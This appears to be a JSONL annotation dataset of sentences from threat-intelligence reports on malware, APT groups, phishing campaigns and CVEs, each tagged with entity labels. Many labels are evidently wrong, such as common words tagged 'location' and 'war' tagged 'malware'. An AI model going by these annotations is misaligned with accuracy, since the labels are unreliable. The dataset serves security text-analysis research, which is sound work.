convention.","entities":[{"id":47380,"label":"malware","start_offset":51,"end_offset":56},{"id":47382,"label":"TIME","start_offset":69,"end_offset":74}],"relations":[],"Comments":[]} +{"id":9756,"text":"The other layers are simple obfuscated PowerShell scripts.","entities":[{"id":29746,"label":"location","start_offset":17,"end_offset":20},{"id":29747,"label":"attack-pattern","start_offset":39,"end_offset":49}],"relations":[],"Comments":[]} +{"id":5633,"text":" Figure 5.","entities":[],"relations":[],"Comments":[]} +{"id":2205,"text":"This malware sample will also dynamically load a number of functions and libraries.","entities":[],"relations":[],"Comments":[]} +{"id":7776,"text":"We also found that the file delivered is an .MSI executable containing the same .DLL FlawedAmmyy downloader.","entities":[{"id":24099,"label":"location","start_offset":75,"end_offset":79},{"id":24100,"label":"malware","start_offset":85,"end_offset":96}],"relations":[],"Comments":[]} +{"id":2339,"text":"Despite the exploit being an executable instead of shellcode, it was not a standalone binary we could run in our virtual environment.","entities":[],"relations":[],"Comments":[]} +{"id":13819,"text":"The second part of API hooking hooks on \u201cGetExtendedTcpTable.\u201d \u201cGetExtendedTcpTable\u201d is used for retrieving a table that contains a list of TCP endpoints available to the application, and it is frequently used in some network-related commands, such as netstat.","entities":[{"id":42866,"label":"attack-pattern","start_offset":23,"end_offset":30},{"id":42867,"label":"location","start_offset":31,"end_offset":36},{"id":42868,"label":"location","start_offset":132,"end_offset":136},{"id":42869,"label":"location","start_offset":184,"end_offset":187},{"id":42870,"label":"malware","start_offset":252,"end_offset":259}],"relations":[],"Comments":[]} +{"id":3323,"text":" Figure 25.","entities":[],"relations":[],"Comments":[]} +{"id":5421,"text":"This malware is modular in nature and it is likely that each vendor has different modules and architectures that were thought out well by the Cyclops Blink actors.","entities":[{"id":51428,"label":"malware","start_offset":142,"end_offset":155}],"relations":[],"Comments":[]} +{"id":4605,"text":"IM Rules: 1010855 - Microsoft Exchange - HAFNIUM Targeted Vulnerabilities Trend Micro Vision One\u2122 Correlation: Fig - Microsoft Exchange Server RCE Vulnerability (CVE-2021-26855 + CVE-2021-27065) Trend Micro Vision One\u2122 is a purpose-built, threat defense platform with extended detection and response (XDR) capabilities that work to prevent majority of attacks with automated protection.","entities":[{"id":50505,"label":"SOFTWARE","start_offset":83,"end_offset":106},{"id":50504,"label":"threat-actor","start_offset":46,"end_offset":53},{"id":50507,"label":"SOFTWARE","start_offset":213,"end_offset":236},{"id":50506,"label":"vulnerability","start_offset":131,"end_offset":208},{"id":50503,"label":"SOFTWARE","start_offset":25,"end_offset":43}],"relations":[],"Comments":[]} +{"id":2966,"text":"After that, nothing spoils the fun and excitement of unboxing and playing with an exciting new device than trying to figure out what you need to do to use it with reasonable safety and privacy.","entities":[],"relations":[],"Comments":[]} +{"id":9261,"text":"Detection: Delivered on 19\/19 attack steps in the evaluation, for 100% detection.","entities":[],"relations":[],"Comments":[]} +{"id":4896,"text":"Around 15,000 actor accounts were identified, most of which were created for this campaign specifically.","entities":[],"relations":[],"Comments":[]} +{"id":14038,"text":"In our case, the samples from the Operation Earth Kitsune implemented the Mattermost command and control (C2) communication and leaked a local path.","entities":[{"id":47199,"label":"campaign","start_offset":34,"end_offset":57},{"id":47200,"label":"SOFTWARE","start_offset":74,"end_offset":85}],"relations":[],"Comments":[]} +{"id":3603,"text":"The combination of ConfuserEx and CyaX (Cassandra protector) seems to be unique and customized based on the indicators mentioned earlier.","entities":[{"id":49382,"label":"tools","start_offset":19,"end_offset":29},{"id":49383,"label":"tools","start_offset":34,"end_offset":39},{"id":49384,"label":"tools","start_offset":40,"end_offset":59}],"relations":[],"Comments":[]} +{"id":7201,"text":"Besides the ActiveX objects, we noticed that the script added new code to connect websocket to localhost.","entities":[],"relations":[],"Comments":[]} +{"id":2847,"text":"Multiple vendors report that the malware includes the ability to spread via port 445 scans and attacks against the ETERNALBLUE vulnerability not only on internal networks but also across the Internet.","entities":[{"id":45723,"label":"vulnerability","start_offset":115,"end_offset":126}],"relations":[],"Comments":[]} +{"id":1259,"text":" Figure 1. Icons used by malicious Sysget attachments.","entities":[{"id":46635,"label":"malware","start_offset":35,"end_offset":41}],"relations":[],"Comments":[]} +{"id":6991,"text":"Backdoor commands found in CapraRAT This APK file also has the ability to drop mp4 or APK files from asset directory.","entities":[],"relations":[],"Comments":[]} +{"id":3320,"text":" The script will then upload database files inside the WeChat folder including \u201cMicroMsg.db\u201d to cloud storage.","entities":[{"id":48403,"label":"SOFTWARE","start_offset":55,"end_offset":61},{"id":48404,"label":"FILEPATH","start_offset":80,"end_offset":91}],"relations":[],"Comments":[]} +{"id":2873,"text":"After that the exploit uses a ROP chain to overwrite the virtual function table of a sound object to gain full control.","entities":[],"relations":[],"Comments":[]} +{"id":1872,"text":"Avast responded to our notification with this statement: \"We can confirm the vulnerability in an old version of our driver aswArPot.sys, which we fixed in our Avast 21.5 released in June 2021.","entities":[{"id":45157,"label":"FILEPATH","start_offset":123,"end_offset":135},{"id":45158,"label":"SOFTWARE","start_offset":159,"end_offset":169},{"id":45159,"label":"TIME","start_offset":182,"end_offset":191},{"id":45160,"label":"identity","start_offset":0,"end_offset":5}],"relations":[{"id":286,"from_id":45158,"to_id":45157,"type":"consists-of"}],"Comments":[]} +{"id":5379,"text":" File download (0x0f) This module can download files from the internet.","entities":[],"relations":[],"Comments":[]} +{"id":506,"text":"This post supplements that information based on observations from the first three months of 2021, and will discuss the propagation of different ransomware families we observed in the wild and the different types of extortion used.","entities":[{"id":46139,"label":"TIME","start_offset":92,"end_offset":96}],"relations":[],"Comments":[]} +{"id":6121,"text":"We were able to uncover an additional two samples using the QTI International Inc certificate and Google Code pages.","entities":[{"id":18926,"label":"tools","start_offset":16,"end_offset":23},{"id":18929,"label":"location","start_offset":94,"end_offset":97}],"relations":[],"Comments":[]} +{"id":4573,"text":"COLDRIVER, a Russian-based threat actor sometimes referred to as Callisto, continues to send credential phishing emails to targets including government and defense officials, politicians, NGOs and think tanks, and journalists.","entities":[{"id":50416,"label":"threat-actor","start_offset":65,"end_offset":73},{"id":50415,"label":"threat-actor","start_offset":0,"end_offset":9},{"id":50417,"label":"attack-pattern","start_offset":88,"end_offset":119}],"relations":[{"id":967,"from_id":50416,"to_id":50415,"type":"duplicate-of"},{"id":968,"from_id":50415,"to_id":50417,"type":"uses"}],"Comments":[]} +{"id":10716,"text":"Additional analysis and insights by Higashi Yuka and Chizuru Toyama REDBALDKNIGHT, also known as BRONZE BUTLER and Tick, is a cyberespionage group known to target Japanese organizations such as government agencies (including defense) as well as those in biotechnology, electronics manufacturing, and industrial chemistry.","entities":[{"id":32718,"label":"location","start_offset":20,"end_offset":23},{"id":32720,"label":"location","start_offset":49,"end_offset":52},{"id":32722,"label":"threat-actor","start_offset":68,"end_offset":81},{"id":32724,"label":"location","start_offset":111,"end_offset":114},{"id":32725,"label":"threat-actor","start_offset":115,"end_offset":119},{"id":32726,"label":"location","start_offset":156,"end_offset":162},{"id":32728,"label":"location","start_offset":296,"end_offset":299},{"id":32729,"label":"location","start_offset":300,"end_offset":310}],"relations":[],"Comments":[]} +{"id":5914,"text":"Link to Jon\u2019s panel discussion in Davos: https:\/\/www.youtube.com\/watch?v=GAZng8u9FXk","entities":[],"relations":[],"Comments":[]} +{"id":4553,"text":"The apps were not distributed through the Google Play Store, but hosted on a domain controlled by the actor and disseminated via links on third party messaging services.","entities":[{"id":50363,"label":"SOFTWARE","start_offset":42,"end_offset":59}],"relations":[],"Comments":[]} +{"id":13564,"text":"These scripts were managed with an XSS attack framework called \u201cXSS.ME,\u201d which helps attackers deal with their attack scripts and the stolen information.","entities":[{"id":51644,"label":"attack-pattern","start_offset":35,"end_offset":38},{"id":51645,"label":"tools","start_offset":64,"end_offset":70}],"relations":[],"Comments":[]} +{"id":4528,"text":"We recently expanded eligibility to protect Ukraine government organizations, and we are currently protecting over 200 Ukraine websites today.","entities":[{"id":50324,"label":"identity","start_offset":44,"end_offset":76},{"id":50325,"label":"location","start_offset":119,"end_offset":126}],"relations":[],"Comments":[]} +{"id":3163,"text":"In addition, this move from AWS validates our XDR strategy, which is focused on using as many data sources as possible to enhance detection and response.","entities":[{"id":48283,"label":"identity","start_offset":28,"end_offset":31}],"relations":[],"Comments":[]} +{"id":13480,"text":"Government-backed or state-sponsored groups have different goals in carrying out their attacks: Some are looking to collect intelligence or steal intellectual property; others are targeting dissidents or activists, or attempting to engage in coordinated influence operations and disinformation campaigns.","entities":[],"relations":[],"Comments":[]} +{"id":2812,"text":" WanaCrypt0r is a global ransomware attack that emerged on Friday, May 12, 2017.","entities":[{"id":48030,"label":"malware","start_offset":1,"end_offset":12},{"id":48031,"label":"TIME","start_offset":59,"end_offset":79}],"relations":[],"Comments":[]} +{"id":427,"text":"In this case, we are concerned about coin mining code that\u2019s used on websites.","entities":[],"relations":[],"Comments":[]} +{"id":3106,"text":" Risk Assessment","entities":[],"relations":[],"Comments":[]} +{"id":2581,"text":"Though sometimes called a ransomware group in reports, Lapsus$ is notable for not deploying ransomware in extortion attempts.","entities":[{"id":7789,"label":"threat-actor","start_offset":55,"end_offset":62}],"relations":[],"Comments":[]} +{"id":5019,"text":"The data is then exfiltrated via email to a compromised email account.","entities":[],"relations":[],"Comments":[]} +{"id":10429,"text":"Kaseya provides IT management software to mostly managed service providers (MSPs).","entities":[],"relations":[],"Comments":[]} +{"id":8345,"text":"x.TextContent.StartsWith(\"Access for less secure apps has been turned on\") ||","entities":[],"relations":[],"Comments":[]} +{"id":14307,"text":"Here, Uninstall.exe is used to get the Windows account and password, and then writes the result to C:\\Users\\%username%\\AppData\\local\\password.txt.","entities":[{"id":48527,"label":"SOFTWARE","start_offset":39,"end_offset":47},{"id":48526,"label":"FILEPATH","start_offset":6,"end_offset":19},{"id":48528,"label":"FILEPATH","start_offset":98,"end_offset":145}],"relations":[],"Comments":[]} +{"id":10890,"text":" Figure 11. Code showing the creation of the directory ","entities":[],"relations":[],"Comments":[]} +{"id":3635,"text":" You can see an image of how this works below in Figure 1. Figure 1 Conversation Hijacking to Deliver Malware How this works is that two users, Alice (A) and Bob (B) are carrying on an email conversation.","entities":[],"relations":[],"Comments":[]} +{"id":4325,"text":"Behind the scenes, a .NET DLL file named skfk.txt, which is filled with content found inside the \u201cComments\u201d property of the document, is created in the temporary directory.","entities":[{"id":50127,"label":"FILEPATH","start_offset":41,"end_offset":49}],"relations":[],"Comments":[]} +{"id":2950,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} +{"id":13253,"text":"The first PDB string has a certain ss2\/Projects\/MsiWrapper (Project MsiWrapper) in it, which we found to be an open-source application that converts executable setup programs to MSI files.","entities":[{"id":41312,"label":"location","start_offset":35,"end_offset":38},{"id":41313,"label":"attack-pattern","start_offset":116,"end_offset":122}],"relations":[],"Comments":[]} +{"id":12095,"text":"We believe this is a technique the attacker is using to evade detection rules.","entities":[],"relations":[],"Comments":[]} +{"id":10999,"text":"We have also taken extraordinary measures beyond our actions against coordinated influence operations to protect users and stop the spread of misinformation and disinformation about the war in Ukraine online.","entities":[{"id":33527,"label":"location","start_offset":119,"end_offset":122},{"id":33528,"label":"malware","start_offset":123,"end_offset":127},{"id":33529,"label":"location","start_offset":157,"end_offset":160},{"id":33530,"label":"location","start_offset":186,"end_offset":189}],"relations":[],"Comments":[]} +{"id":1680,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} +{"id":2609,"text":"When employed, various techniques to bypass MFA are observed \u2013 from social engineering, through SIM-swapping and even compromising MFA\/telecoms providers. Zero Trust network architecture and strong security hygiene are the best defenses against this type of threat actor.","entities":[],"relations":[],"Comments":[]} +{"id":8039,"text":"One of the most notable characteristics of APT35 is their impersonation of conference officials to conduct phishing attacks.","entities":[{"id":24939,"label":"location","start_offset":11,"end_offset":15},{"id":24941,"label":"attack-pattern","start_offset":107,"end_offset":115}],"relations":[],"Comments":[]} +{"id":14170,"text":"On March 8, President Biden signed an Executive Order to ban the sale of Russian oil, liquefied natural gas and coal to the United States.","entities":[{"id":48210,"label":"TIME","start_offset":3,"end_offset":10},{"id":48213,"label":"location","start_offset":124,"end_offset":137},{"id":48211,"label":"identity","start_offset":12,"end_offset":27},{"id":48212,"label":"location","start_offset":73,"end_offset":81}],"relations":[],"Comments":[]} +{"id":6135,"text":"The PlugX sample in Table 4 used the same Google Code page and redirect, but the QTI International Inc certificate.","entities":[{"id":18976,"label":"malware","start_offset":4,"end_offset":9},{"id":18977,"label":"location","start_offset":10,"end_offset":16},{"id":18979,"label":"location","start_offset":37,"end_offset":41},{"id":18980,"label":"tools","start_offset":54,"end_offset":58},{"id":18981,"label":"location","start_offset":59,"end_offset":62}],"relations":[],"Comments":[]} +{"id":9809,"text":"Based on the language that was hardcoded in the samples we found, TICK appeared to be targeting Japanese organizations with subsidiaries in China to serve as footholds for intrusion: TICK hard-coded two code pages 932 and 936, referring to Japanese and Simplified Chinese characters respectively.","entities":[{"id":29908,"label":"threat-actor","start_offset":66,"end_offset":70},{"id":29911,"label":"threat-actor","start_offset":183,"end_offset":187},{"id":29912,"label":"location","start_offset":188,"end_offset":192},{"id":29915,"label":"location","start_offset":218,"end_offset":221},{"id":29918,"label":"location","start_offset":249,"end_offset":252}],"relations":[],"Comments":[]} +{"id":1265,"text":"Five Sysget samples used to target two Japanese organizations.","entities":[{"id":46640,"label":"identity","start_offset":39,"end_offset":61},{"id":46641,"label":"malware","start_offset":5,"end_offset":11}],"relations":[],"Comments":[]} +{"id":4309,"text":"While investigating the Confucius threat actor, we found a recent spear phishing campaign that utilizes Pegasus spyware-related lures to entice victims into opening a malicious document downloading a file stealer.","entities":[{"id":50105,"label":"attack-pattern","start_offset":66,"end_offset":80},{"id":50106,"label":"malware","start_offset":104,"end_offset":111}],"relations":[],"Comments":[]} +{"id":4930,"text":"In this blog, we explore some of the most notable campaigns we\u2019ve disrupted this year from a different government-backed attacker: APT35, an Iranian group, which regularly conducts phishing campaigns targeting high risk users.","entities":[{"id":50945,"label":"threat-actor","start_offset":131,"end_offset":136},{"id":50947,"label":"location","start_offset":141,"end_offset":148}],"relations":[{"id":1033,"from_id":50945,"to_id":50947,"type":"located-at"}],"Comments":[]} +{"id":13654,"text":"The email was sent from an IP address recorded on one of the phishing sites that the attacker tested its functionality on.","entities":[{"id":51744,"label":"attack-pattern","start_offset":61,"end_offset":69}],"relations":[],"Comments":[]} +{"id":8741,"text":"We received leads from Facebook that supported us in this investigation.","entities":[],"relations":[],"Comments":[]} +{"id":8976,"text":"We found 13 different targets while following our sensors\u2018 data.","entities":[],"relations":[],"Comments":[]} +{"id":14147,"text":" Tags Articles, News, Reports | APT & Targeted Attacks | Research","entities":[],"relations":[],"Comments":[]} +{"id":5690,"text":"The first cluster is built using virtual private servers (VPS), rented from a service provider, that are used for the group\u2019s watering hole and spear phishing operations, in addition to acting as a command-and-control (C&C) server for malware.","entities":[{"id":17551,"label":"location","start_offset":101,"end_offset":104},{"id":17552,"label":"location","start_offset":135,"end_offset":139},{"id":17553,"label":"location","start_offset":140,"end_offset":143},{"id":17554,"label":"attack-pattern","start_offset":144,"end_offset":158},{"id":17555,"label":"location","start_offset":206,"end_offset":209}],"relations":[],"Comments":[]} +{"id":1766,"text":" The first line of defense is the IPS.","entities":[],"relations":[],"Comments":[]} +{"id":6917,"text":"The majority of targets we observed were from North Korea or individuals who worked on North Korea-related issues.","entities":[],"relations":[],"Comments":[]} +{"id":1575,"text":" We are not aware of any reports of successful recovery after paying the ransom.","entities":[],"relations":[],"Comments":[]} +{"id":12831,"text":"Public security Schedule Enterprises Need to be Proactive PLEAD, Shrouded Crossbow, and Waterbear","entities":[{"id":39972,"label":"location","start_offset":0,"end_offset":6},{"id":39973,"label":"location","start_offset":7,"end_offset":15},{"id":39974,"label":"malware","start_offset":60,"end_offset":65},{"id":39975,"label":"threat-actor","start_offset":67,"end_offset":84},{"id":39976,"label":"location","start_offset":86,"end_offset":89},{"id":39977,"label":"malware","start_offset":90,"end_offset":99}],"relations":[],"Comments":[]} +{"id":5234,"text":" AnubisSpy can steal messages (SMS), photos, videos, contacts, email accounts, calendar events, and browser histories (i.e., Chrome and Samsung Internet Browser).","entities":[{"id":51267,"label":"malware","start_offset":1,"end_offset":10},{"id":51268,"label":"attack-pattern","start_offset":15,"end_offset":35},{"id":51269,"label":"SOFTWARE","start_offset":125,"end_offset":131},{"id":51270,"label":"SOFTWARE","start_offset":136,"end_offset":160}],"relations":[],"Comments":[]} +{"id":165,"text":"These also happen to be files users are most likely to use on a day-to-day basis or that are critical to an organization\u2019s operations.","entities":[],"relations":[],"Comments":[]} +{"id":12564,"text":"An N-day is a known vulnerability with a publicly available patch.","entities":[],"relations":[],"Comments":[]} +{"id":13815,"text":"\u201cZwOpenProcess\u201d after modification","entities":[],"relations":[],"Comments":[]} +{"id":1563,"text":"Palo Alto Networks Unit 42 regularly researches threats like these and provides information about them on our blog.","entities":[{"id":45057,"label":"identity","start_offset":0,"end_offset":26}],"relations":[],"Comments":[]} +{"id":653,"text":"Once the fake chkdisk completes, the malware displays a ransom note which demands a payment of $300 in bitcoin.","entities":[],"relations":[],"Comments":[]} +{"id":3009,"text":"Just like with home entertainment devices, it\u2019s the cloud-based account that attackers are more interested in.","entities":[],"relations":[],"Comments":[]} +{"id":2455,"text":"Our Spring Core Remote Code Execution Vulnerability signature was released in the early hours of March 31.","entities":[{"id":47528,"label":"vulnerability","start_offset":4,"end_offset":51},{"id":47529,"label":"TIME","start_offset":82,"end_offset":105}],"relations":[],"Comments":[]} +{"id":5162,"text":"Let us know in the comments below, hit us up on social @TrendMicro or you can reach me directly @marknca.","entities":[{"id":51216,"label":"identity","start_offset":96,"end_offset":104},{"id":51215,"label":"identity","start_offset":55,"end_offset":66}],"relations":[],"Comments":[]} +{"id":12333,"text":"We terminated 3,317 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to China.","entities":[],"relations":[],"Comments":[]} +{"id":4628,"text":"Now, we\u2019re shining light on a new tool of theirs.","entities":[],"relations":[],"Comments":[]} +{"id":767,"text":"Figure 4 shows an example of the structure in memory.","entities":[],"relations":[],"Comments":[]} +{"id":4737,"text":"Where once we only needed substreams to focus on threat actors such as China, Russia, and North Korea, TAG now has a dedicated analysis subteam dedicated to commercial vendors and operators.","entities":[{"id":50649,"label":"location","start_offset":71,"end_offset":76},{"id":50650,"label":"location","start_offset":78,"end_offset":84},{"id":50651,"label":"location","start_offset":90,"end_offset":101},{"id":50652,"label":"identity","start_offset":103,"end_offset":106}],"relations":[],"Comments":[]} +{"id":3227,"text":"The most important task of the c1222 script is to download, decode, and execute the Cobalt Strike shellcode.","entities":[{"id":48346,"label":"malware","start_offset":31,"end_offset":36},{"id":48345,"label":"tools","start_offset":84,"end_offset":97}],"relations":[],"Comments":[]} +{"id":14338,"text":"Another thing that we discovered about the games offered by Round Year Fun is that if you authorize it to use your Twitter account, the author can use the account to promote games using automation tools.","entities":[{"id":48569,"label":"SOFTWARE","start_offset":115,"end_offset":123}],"relations":[],"Comments":[]} +{"id":642,"text":" Delivery\/Exploitation","entities":[],"relations":[],"Comments":[]} +{"id":11,"text":"Most legacy security programs could not detect this malware at the time it was posted.","entities":[],"relations":[],"Comments":[]} +{"id":9522,"text":"However, it is possible that multiple groups might be covertly sharing the source code for this malware.","entities":[{"id":29212,"label":"attack-pattern","start_offset":75,"end_offset":81}],"relations":[],"Comments":[]} +{"id":6214,"text":"Therefore, the victim also loads the malicious script with the replaced wrapper page whenever they access the webmail server with the malicious Service Worker enabled in the background.","entities":[{"id":19190,"label":"tools","start_offset":80,"end_offset":84}],"relations":[],"Comments":[]} +{"id":1986,"text":"This post is also available in: \u65e5\u672c\u8a9e (Japanese) HelloXD is a ransomware family performing double extortion attacks that surfaced in November 2021.","entities":[{"id":45202,"label":"malware","start_offset":53,"end_offset":60},{"id":45203,"label":"TIME","start_offset":137,"end_offset":150},{"id":45205,"label":"attack-pattern","start_offset":95,"end_offset":111}],"relations":[{"id":81,"from_id":45202,"to_id":45205,"type":"uses"}],"Comments":[]} +{"id":444,"text":"Here the site itself has been attacked, and the site owners are also victims.","entities":[],"relations":[],"Comments":[]} +{"id":2987,"text":"All modern tablets and smartphones have settings you should enable before you take these portable devices out of your home: a. Passcodes to lock the device.","entities":[],"relations":[],"Comments":[]} +{"id":3798,"text":"When we tracked ChessMaster back in November, we noted that it exploited the SOAP WSDL parser vulnerability CVE-2017-8759 (patched in September 2017) within the Microsoft .NET framework to download additional malware.","entities":[{"id":49661,"label":"malware","start_offset":16,"end_offset":27},{"id":49664,"label":"TIME","start_offset":134,"end_offset":148},{"id":49666,"label":"vulnerability","start_offset":77,"end_offset":121},{"id":49662,"label":"TIME","start_offset":36,"end_offset":44},{"id":49667,"label":"SOFTWARE","start_offset":161,"end_offset":185}],"relations":[{"id":854,"from_id":49661,"to_id":49666,"type":"exploits"},{"id":855,"from_id":49667,"to_id":49666,"type":"has"}],"Comments":[]} +{"id":9050,"text":"Kill: Posts a job to kill the backdoor inject Posts a job for DLL injection Interval Changes the sleep interval Cmd","entities":[{"id":27949,"label":"location","start_offset":14,"end_offset":17},{"id":27950,"label":"location","start_offset":54,"end_offset":57},{"id":27951,"label":"malware","start_offset":112,"end_offset":115}],"relations":[],"Comments":[]} +{"id":3246,"text":"If the backdoor finds that the file \u201cdebug\u201d present inside the root directory, it will wait for 130 seconds and then continue with execution. Figure 16.","entities":[],"relations":[],"Comments":[]} +{"id":6919,"text":"The vulnerabilities underlying these exploits included: Internet Explorer - CVE-2018-8653 Internet Explorer - CVE-2019-0676 Chrome - CVE-2019-5786 Windows Kernel - CVE-2019-0808 Internet Explorer - CVE-2019-1367 Internet Explorer - CVE-2019-1429","entities":[],"relations":[],"Comments":[]} +{"id":4808,"text":"The app is distributed under the guise of performing Denial of Service (DoS) attacks against a set of Russian websites.","entities":[{"id":50724,"label":"attack-pattern","start_offset":53,"end_offset":84}],"relations":[],"Comments":[]} +{"id":10672,"text":"Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 CVE-2021-40438 9 mod_proxy SSRF CVE-2020-11984 9.8 mod_proxy_uwsgi buffer overflow CVE-2019-10098 6.1 mod_rewrite potential open redirect CVE-2019-10097 7.2 CVE-2019-10097 mod_remoteip Stack buffer overflow and NULL pointer dereference CVE-2019-0190 7.5 mod_ssl 2.4.37 remote DoS when used with OpenSSL 1.1.1 CVE-2018-8011 7.5 mod_md, DoS via Coredumps on specially crafted requests CVE-2018-1303 7.5 Possible out of bound read in mod_cache_socache CVE-2018-11763 5.9 DoS for HTTP\/2 connections by continuous SETTINGS CVE-2017-9798 7.5 Use-after-free when using with an unrecognized method in .htaccess (\"OptionsBleed\") CVE-2017-9788 9.1 Uninitialized memory reflection in mod_auth_digest CVE-2017-7668 9.8 ap_find_token()","entities":[{"id":32577,"label":"attack-pattern","start_offset":0,"end_offset":14},{"id":32578,"label":"location","start_offset":15,"end_offset":18},{"id":32579,"label":"location","start_offset":52,"end_offset":58},{"id":32580,"label":"attack-pattern","start_offset":145,"end_offset":160},{"id":32581,"label":"attack-pattern","start_offset":269,"end_offset":284},{"id":32582,"label":"location","start_offset":285,"end_offset":288},{"id":32583,"label":"location","start_offset":294,"end_offset":301},{"id":32584,"label":"location","start_offset":347,"end_offset":353},{"id":32585,"label":"location","start_offset":536,"end_offset":541}],"relations":[],"Comments":[]} +{"id":8646,"text":"Related IOCs lragir[.]org armradio[.]org asbares[.]com armtimes[.]net armlur[.]org armenpress[.]org hraparak[.]org armtimes[.]org hetq[.]org","entities":[],"relations":[],"Comments":[]} +{"id":783,"text":"So the next time IE tries to access a freed object an invalid address exception would be raised.","entities":[{"id":46348,"label":"SOFTWARE","start_offset":17,"end_offset":20}],"relations":[],"Comments":[]} +{"id":999,"text":"The descriptions for these items proposed three main uses for buyers: ","entities":[],"relations":[],"Comments":[]} +{"id":6580,"text":"We also found a live service selling VPS hosting at secure[.]66[.]to.","entities":[],"relations":[],"Comments":[]} +{"id":1605,"text":" Figure 3: Remote control app terms of service.","entities":[],"relations":[],"Comments":[]} +{"id":3547,"text":"The Trend Micro\u2122 Deep Discovery\u2122 Email Inspector and InterScan\u2122 Web Security solutions prevent malware from ever reaching end users.","entities":[{"id":49329,"label":"tools","start_offset":53,"end_offset":62},{"id":49327,"label":"identity","start_offset":4,"end_offset":15},{"id":49328,"label":"tools","start_offset":17,"end_offset":31}],"relations":[],"Comments":[]} +{"id":9278,"text":"The amount of payment information that was stolen is still unknown.","entities":[],"relations":[],"Comments":[]} +{"id":9413,"text":"Based on our analysis, this group targets gambling websites.","entities":[],"relations":[],"Comments":[]} +{"id":7981,"text":"In collaboration with YouTube, Gmail, Trust & Safety, CyberCrime Investigation Group and Safe Browsing teams, our protections have decreased the volume of related phishing emails on Gmail by 99.6% since May 2021.","entities":[{"id":24737,"label":"location","start_offset":85,"end_offset":88},{"id":24739,"label":"attack-pattern","start_offset":163,"end_offset":171}],"relations":[],"Comments":[]} +{"id":4650,"text":"Accept-Encoding: gzip Connection: Keep-Alive","entities":[],"relations":[],"Comments":[]} +{"id":378,"text":"Vulnerable Systems CVE-2022-26134 in the Wild Cortex Managed Threat Hunting Detections of CVE-2022-26134","entities":[{"id":44726,"label":"vulnerability","start_offset":19,"end_offset":33},{"id":44727,"label":"SOFTWARE","start_offset":46,"end_offset":52},{"id":44728,"label":"vulnerability","start_offset":90,"end_offset":104}],"relations":[],"Comments":[]} +{"id":3430,"text":"flash_installer.exe BIOPASS RAT Loader Backdoor.","entities":[{"id":10321,"label":"malware","start_offset":21,"end_offset":32},{"id":49121,"label":"FILEPATH","start_offset":0,"end_offset":19}],"relations":[],"Comments":[]} +{"id":4760,"text":"On Gmail, we recommend certain Gmail security precautions to prevent spoofing, phishing, and spam.","entities":[{"id":50667,"label":"attack-pattern","start_offset":69,"end_offset":77},{"id":50665,"label":"SOFTWARE","start_offset":3,"end_offset":8},{"id":50666,"label":"SOFTWARE","start_offset":31,"end_offset":36},{"id":50668,"label":"attack-pattern","start_offset":79,"end_offset":87},{"id":50669,"label":"attack-pattern","start_offset":93,"end_offset":97}],"relations":[],"Comments":[]} +{"id":8625,"text":"The four exploits were used as a part of three different campaigns.","entities":[],"relations":[],"Comments":[]} +{"id":58,"text":"Figure 2: Price of bitcoin in U.S. dollars from CoinMarketCap While botnets mining cryptocurrency is nothing new, the technique was much less profitable than using ransomware.","entities":[{"id":45817,"label":"SOFTWARE","start_offset":19,"end_offset":26},{"id":45818,"label":"SOFTWARE","start_offset":48,"end_offset":60}],"relations":[],"Comments":[]} +{"id":5977,"text":"Recently observed Turla domains: COLDRIVER, a Russian-based threat actor sometimes referred to as Callisto, continues to use Gmail accounts to send credential phishing emails to a variety of Google and non-Google accounts.","entities":[{"id":18388,"label":"attack-pattern","start_offset":159,"end_offset":167},{"id":18390,"label":"location","start_offset":198,"end_offset":201}],"relations":[],"Comments":[]} +{"id":1378,"text":"This file is a legitimate Microsoft Windows binary.","entities":[{"id":4137,"label":"identity","start_offset":26,"end_offset":35}],"relations":[],"Comments":[]} +{"id":766,"text":"This structure is created in the function MemoryProtection::CMemoryProtector::ProtectCurrentThread and is used to manage deferred free heap blocks.","entities":[],"relations":[],"Comments":[]} +{"id":298,"text":"Learn more and see a detailed workflow example on the Palo Alto Networks SecOps blog, \u201cHow Xpanse Can Identify CISA-Identified Known Exploited Vulnerabilities.\u201d ","entities":[{"id":45998,"label":"identity","start_offset":111,"end_offset":115},{"id":45996,"label":"identity","start_offset":54,"end_offset":72},{"id":45997,"label":"SOFTWARE","start_offset":91,"end_offset":97}],"relations":[],"Comments":[]} +{"id":12525,"text":"To protect our users, TAG routinely hunts for 0-day vulnerabilities exploited in-the-wild.","entities":[],"relations":[],"Comments":[]} +{"id":12677,"text":"We have also taken extraordinary measures beyond our actions against coordinated influence operations to protect users and stop the spread of misinformation and disinformation about the war in Ukraine online.","entities":[{"id":39330,"label":"location","start_offset":119,"end_offset":122},{"id":39331,"label":"malware","start_offset":123,"end_offset":127},{"id":39332,"label":"location","start_offset":157,"end_offset":160},{"id":39333,"label":"location","start_offset":186,"end_offset":189}],"relations":[],"Comments":[]} +{"id":867,"text":"While ransomware is often thought to be bullet-proof, it is certainly not always the case.","entities":[],"relations":[],"Comments":[]} +{"id":7518,"text":"Variable ${prIVATE} = 959, 713 from section 1 of the PowerShell script has two values; the first number is the key and the second number is the modulus.","entities":[{"id":23368,"label":"location","start_offset":36,"end_offset":43},{"id":23370,"label":"attack-pattern","start_offset":53,"end_offset":63},{"id":23372,"label":"location","start_offset":115,"end_offset":118}],"relations":[],"Comments":[]} +{"id":5068,"text":"We\u2019ll continue to take action, identify bad actors and share relevant information with others across industry and governments, with the goal of bringing awareness to these issues, protecting users and preventing future attacks.","entities":[],"relations":[],"Comments":[]} +{"id":13702,"text":"Be wary of irregular emails with suspicious content such as dubious sender email, domain name, writing style, and urgent requests.","entities":[],"relations":[],"Comments":[]} +{"id":11583,"text":"It also contains a minimalist agent capable of exfiltrating interesting files from the device, such as the Whatsapp database.","entities":[],"relations":[],"Comments":[]} +{"id":11719,"text":"Indicator of Compromise Android Part IoCs Indicator Package name Label C2 server Detection 0c182b51ff1dffaa384651e478155632c6e65820322774e416be20e6d49bb8f9 com.example.firstandoidapp ","entities":[{"id":36115,"label":"SHA2","start_offset":97,"end_offset":161}],"relations":[],"Comments":[]} +{"id":3568,"text":"While ConfuserEx is able to apply multiple transformations to the target binary, we are interested in two particular functions that we can use for correlation: Source code building.","entities":[{"id":49352,"label":"tools","start_offset":6,"end_offset":16}],"relations":[],"Comments":[]} +{"id":7303,"text":" Get memory information ioreg -rd1 -c IOPlatformExpertDevice | awk 